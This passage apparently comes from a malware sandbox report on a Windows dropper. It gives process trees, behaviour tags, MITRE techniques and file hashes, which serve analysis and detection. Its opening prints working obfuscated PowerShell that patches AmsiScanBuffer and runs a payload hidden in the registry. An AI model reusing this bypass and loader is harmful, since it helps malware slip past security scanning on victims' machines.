''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+','+'Ne'+'w'+''+'S'+''+'l'+''+[Char](111)+''+[Char](116)+','+[Char](86)+'ir'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$TkrtvzmLFo,$niVheqHByRnEmo).SetImplementationFlags(''+'R'+'un'+'t'+'im'+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $SDlcOSEWejH.CreateType();}$jhaQOxOOVeYdY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+'feN'+[Char](97)+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$FTraKBMQSkUVrq=$jhaQOxOOVeYdY.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+'cA'+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+'lic'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'tic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ehXpyxDpjqSfKyFqxDV=mBaHdzMYzvDa @([String])([IntPtr]);$sRMwyseYRMKuJiWgTvlMrt=mBaHdzMYzvDa @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AZnZUmPDNAs=$jhaQOxOOVeYdY.GetMethod(''+'G'+'e'+'t'+'M'+[Char](111)+''+[Char](100)+'u'+'l'+'e'+[Char](72)+''+[Char](97)+'ndl'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+'l'+'3'+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$YKxhrbNZMaIpAo=$FTraKBMQSkUVrq.Invoke($Null,@([Object]$AZnZUmPDNAs,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$NUgSFahSZhVULgnon=$FTraKBMQSkUVrq.Invoke($Null,@([Object]$AZnZUmPDNAs,[Object]('V'+[Char](105)+''+[Char](114)+'tu'+[Char](97)+'l'+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$ZdEKIbc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YKxhrbNZMaIpAo,$ehXpyxDpjqSfKyFqxDV).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$kRgVdjrEVFpPREfju=$FTraKBMQSkUVrq.Invoke($Null,@([Object]$ZdEKIbc,[Object](''+'A'+'m'+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+'Bu'+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$bAyYKNYHwt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NUgSFahSZhVULgnon,$sRMwyseYRMKuJiWgTvlMrt).Invoke($kRgVdjrEVFpPREfju,[uint32]8,4,[ref]$bAyYKNYHwt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kRgVdjrEVFpPREfju,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NUgSFahSZhVULgnon,$sRMwyseYRMKuJiWgTvlMrt).Invoke($kRgVdjrEVFpPREfju,[uint32]8,0x20,[ref]$bAyYKNYHwt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+'7'+[Char](55)+'s'+[Char](116)+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4908
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1448
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2064

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2180

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2252

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2720

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2792

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3104

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3340
- C:\Users\Admin\AppData\Local\Temp\dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
  "C:\Users\Admin\AppData\Local\Temp\dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1352
  - - C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
      "C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3268
    - - C:\Users\Admin\AppData\Local\Temp\$773372c6
        
        "C:\Users\Admin\AppData\Local\Temp\$773372c6"
        5⤵
        Executes dropped EXE
        
        PID:884
    - - C:\Users\Admin\AppData\Local\Temp\$77419698
        
        "C:\Users\Admin\AppData\Local\Temp\$77419698"
        5⤵
        Executes dropped EXE
        
        PID:4988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3580

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3976

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4012

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4456

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:848

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:680

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4252

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1908

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe

Filesize
4.5MB

MD5
133fda00a490e613f3a6c511c1c660eb

SHA1
e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

SHA256
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

SHA512
f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

Filesize
1.8MB

MD5
8c2ad888796dd437e88eaec086475531

SHA1
f93a9948c83c4ddfe87279dd7fa167dee5baae07

SHA256
dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4

SHA512
ba5371bea752a6659b3af866b28f757b3f744d6bd597085428dd7a41f3b649edf49eaeb0375174d81a78613f4293be1cd6c68924f196c3464c20b634f1ec9346

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_jctvlo3q.rev.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1352-3918-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1352-21-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1352-20-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1352-19-0x0000000000C51000-0x0000000000C7F000-memory.dmp

Filesize
184KB

Download
memory/1352-18-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1352-40-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1352-4935-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1352-4936-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1784-4164-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1784-4933-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/2020-5646-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/2020-5636-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/2364-0-0x0000000000750000-0x0000000000C07000-memory.dmp

Filesize
4.7MB

Download
memory/2364-17-0x0000000000750000-0x0000000000C07000-memory.dmp

Filesize
4.7MB

Download
memory/2364-5-0x0000000000750000-0x0000000000C07000-memory.dmp

Filesize
4.7MB

Download
memory/2364-3-0x0000000000750000-0x0000000000C07000-memory.dmp

Filesize
4.7MB

Download
memory/2364-2-0x0000000000751000-0x000000000077F000-memory.dmp

Filesize
184KB

Download
memory/2364-1-0x00000000773B6000-0x00000000773B8000-memory.dmp

Filesize
8KB

Download
memory/3268-96-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-65-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-87-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-93-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-91-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-103-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-107-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-105-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-101-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-99-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-97-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-67-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-89-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-85-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-83-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-81-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-77-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-75-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-73-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-71-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-69-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-79-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-63-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-61-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-59-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-58-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-55-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-53-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-46-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-47-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-49-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-4930-0x00000000074C0000-0x000000000753E000-memory.dmp

Filesize
504KB

Download
memory/3268-4931-0x0000000005E10000-0x0000000005E5C000-memory.dmp

Filesize
304KB

Download
memory/3268-51-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-45-0x0000000007300000-0x0000000007392000-memory.dmp

Filesize
584KB

Download
memory/3268-44-0x0000000007810000-0x0000000007DB6000-memory.dmp

Filesize
5.6MB

Download
memory/3268-4938-0x0000000072D7E000-0x0000000072D7F000-memory.dmp

Filesize
4KB

Download
memory/3268-43-0x0000000007020000-0x0000000007260000-memory.dmp

Filesize
2.2MB

Download
memory/3268-41-0x0000000072D7E000-0x0000000072D7F000-memory.dmp

Filesize
4KB

Download
memory/3268-42-0x0000000000EE0000-0x0000000001366000-memory.dmp

Filesize
4.5MB

Download
memory/3268-5599-0x0000000007730000-0x0000000007784000-memory.dmp

Filesize
336KB

Download
memory/4908-4956-0x00000237AF650000-0x00000237AF67A000-memory.dmp

Filesize
168KB

Download
memory/4908-4955-0x00000237AF2D0000-0x00000237AF2F2000-memory.dmp

Filesize
136KB

Download